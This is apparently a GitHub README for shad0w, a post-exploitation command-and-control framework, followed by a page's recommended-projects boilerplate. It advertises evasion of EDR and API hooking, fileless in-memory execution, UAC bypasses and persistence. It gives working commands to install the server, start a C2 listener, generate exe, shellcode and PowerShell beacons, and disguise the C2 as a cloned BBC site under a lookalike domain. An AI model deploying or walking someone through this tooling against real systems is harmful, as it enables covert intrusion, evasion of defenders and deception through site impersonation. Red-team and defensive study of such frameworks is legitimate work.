shad0w is a post exploitation framework designed to operate covertly on heavily monitored enviroments
- Secure communication over HTTPS.
- Clone and live proxy any website, making the C2 fully browseable.
- Staged and static beacons
- Shellcode and powershell formats allow for completely fileless attacks
- Uses native windows syscalls
- Bypasses userland API hooking
- Blocks EDR from loading DLLs into its process
- Can execute .NET assemblys, EXEs, DLLs, VBS, JS or XSL files completly in memory
- Common privilage escalation exploits built in
- Interact with the file system
- Configurable C2 callback jitter
- Asynchronous command line
- Auto complete
- Up/Down history
- Reverse command search
- Syntax highlighing
- Unmanaged powershell
- Syscalls for older versions of windows
- Kernel mode capability
- More privilage escalation exploits
- Ghost in the logs intergration
- UAC bypasses
- Persistence
- 32 bit support
- More beacon formats
To install shad0w run the two commands below, making sure you already have docker installed on your system.
$ git clone https://github.com/bats3c/shad0w.git && cd shad0w
$ sudo ./shad0w install
To start the C2 server and have it listening for connections you can use the command.
$ shad0w listen -e <endpoint>
Where the <endpoint>
is the IP address or domain name the C2 will be listening on. SSL certificates will also be dynamically generated.
To use the website mirroring functionality you can use the -m
or --mirror
flag
$ shad0w listen -e www.bbc-news.com -m "https://www.bbc.com/"
This will mean that if the C2s address of www.bbc-news.com
is visited the content of https://www.bbc.com/
will be retrived and returned. This is also true for any links on the cloned website. If the person browsing the C2 navigated to https://www.bbc-news.com/sport/football/52799575
the content at https://www.bbc.com/sport/football/52799575
would be mirrored.
Only 64 bit beacons are currently supported
There are two types of beacons, secure
and insecure
. Secure beacons have all the mitigation and evasions techniques built in such syscalls and anti dll injection. These secure beacons are designed to work on the lastest versions of windows.
The insecure beacons are designed to work on a wide variety of windows versions but are designed to be used in situations where detection does not matter.
The synatx for beacon generation.
$ shad0w beacon -p <payload> -H <c2 address> -f <format> -o <filename>
The format for payloads follows the following syntax
<arch>/<os>/<secure>/<static>
So to generate a static 64 bit secure windows beacon it would be
x64/windows/secure/static
Although it is recommended to use staged beacons so the command to generate a staged secure beacon in EXE format would be
$ shad0w beacon -p x64/windows/secure -H www.bbc-news.com -f exe -o beacon.exe
Or for an insecure beacon it would be
$ shad0w beacon -p x64/windows -H www.bbc-news.com -f exe -o beacon.exe
There are currently 3 different beacon formats; exe, shellcode and powershell
The -f
flags is used to control the different formats of the beacons.
To generate a beacon in shellcode or powershell format you can use the raw
or psh
value respectively
$ shad0w beacon -p x64/windows/secure -H www.bbc-news.com -f raw -o beacon.bin
$ shad0w beacon -p x64/windows/secure/static -H www.bbc-news.com -f psh -o beacon.ps1
To get a list of commands you can use the help
command
shad0w ≫ help
To get a list of active beacons you can use the beacons
command
shad0w ≫ beacons
To interact with a beacon use the beacons
command with the -i
flag specifing the beacon id
shad0w ≫ beacons -i 1
shad0w's People
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.